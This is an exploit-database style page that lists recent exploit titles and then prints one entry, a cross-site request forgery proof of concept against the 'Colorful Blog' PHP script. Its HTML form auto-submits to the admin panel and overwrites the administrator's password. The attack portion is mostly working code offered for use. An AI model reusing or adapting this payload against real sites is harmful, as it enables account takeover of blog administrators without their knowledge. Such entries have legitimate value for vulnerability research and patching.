f49abcf00f
13 new exploits Linux Kernel 4.6.3 - Netfilter Privilege Escalation (Metasploit) Linux Kernel 4.6.3 - 'Netfilter' Privilege Escalation (Metasploit) ASLDRService ATK Hotkey 1.0.69.0 - Unquoted Service Path Privilege Escalation Thatware 0.4.6 - SQL Injection InsOnSrv Asus InstantOn 2.3.1.1 - Unquoted Service Path Privilege Escalation Simple Blog PHP 2.0 - Multiple Vulnerabilities Simple Blog PHP 2.0 - SQL Injection Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow) Linux Kernel (Ubuntu 14.04.3) - 'perf_event_open()' Can Race with execve() (Access /etc/shadow) Simple PHP Blog 0.8.4 - (Add Admin) Cross-Site Request Forgery Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin) miniblog 1.0.1 - (Add New Post) Cross-Site Request Forgery miniblog 1.0.1 - Cross-Site Request Forgery (Add New Post) PHP Press Release - (Add Admin) Cross-Site Request Forgery PHP Press Release - Cross-Site Request Forgery (Add Admin) Maian Weblog 4.0 - (Add New Post) Cross-Site Request Forgery Spacemarc News - (Add New Post) Cross-Site Request Forgery Maian Weblog 4.0 - Cross-Site Request Forgery (Add New Post) Spacemarc News - Cross-Site Request Forgery (Add New Post) BirdBlog 1.4.0 - (Add New Post) Cross-Site Request Forgery phpEnter 4.2.7 - (Add New Post) Cross-Site Request Forgery BirdBlog 1.4.0 - Cross-Site Request Forgery (Add New Post) phpEnter 4.2.7 - Cross-Site Request Forgery (Add New Post) ApPHP MicroBlog 1.0.2 - (Add New Author) Cross-Site Request Forgery ApPHP MicroBlog 1.0.2 - Cross-Site Request Forgery (Add New Author) ApPHP MicroCMS 3.9.5 - (Add Admin) Cross-Site Request Forgery ApPHP MicroCMS 3.9.5 - Cross-Site Request Forgery (Add Admin) ATKGFNEXSrv ATKGFNEX 1.0.11.1 - Unquoted Service Path Privilege Escalation VOX Music Player 2.8.8 - '.pls' Denial of Service IObit Malware Fighter 4.3.1 - Unquoted Service Path Privilege Escalation Colorful Blog - Stored Cross Site Scripting Colorful Blog - Cross-Site Request Forgery (Change Admin Password) Hotspot Shield 6.0.3 - Unquoted Service Path Privilege Escalation RSS News AutoPilot Script 1.0.1 / 3.1.0 - Admin Panel Authentication Bypass JonhCMS 4.5.1 - SQL Injection
33 lines
No EOL
1.1 KiB
Text
Executable file
33 lines
No EOL
1.1 KiB
Text
Executable file
# Exploit Title :----------- : Colorful Blog - Cross-Site Request Forgery (Change Admin Pass)
|
|
# Author :------------------ : Besim
|
|
# Google Dork :---------- : -
|
|
# Date :--------------------- : 13/10/2016
|
|
# Type :--------------------- : webapps
|
|
# Platform :---------------- : PHP
|
|
# Vendor Homepage :-- : -
|
|
# Software link :---------- : http://wmscripti.com/php-scriptler/colorful-blog-scripti.html
|
|
|
|
|
|
Description :
|
|
|
|
You can change admin's password with CSRF, if you know admin's username
|
|
|
|
########################### CSRF PoC ###############################
|
|
|
|
<html>
|
|
<!-- CSRF PoC -->
|
|
<body>
|
|
<form action="http://site_name/path/yonetim/admin.php" method="POST">
|
|
<input type="hidden" name="username" value="admin_username" />
|
|
<input type="hidden" name="password" value="besim" />
|
|
<input type="hidden" name="gonder" value="Kaydet" />
|
|
<input type="submit" value="Submit request" />
|
|
</form>
|
|
<script>
|
|
document.forms[0].submit();
|
|
</script>
|
|
</body>
|
|
</html>
|
|
|
|
|
|
#################################################################### |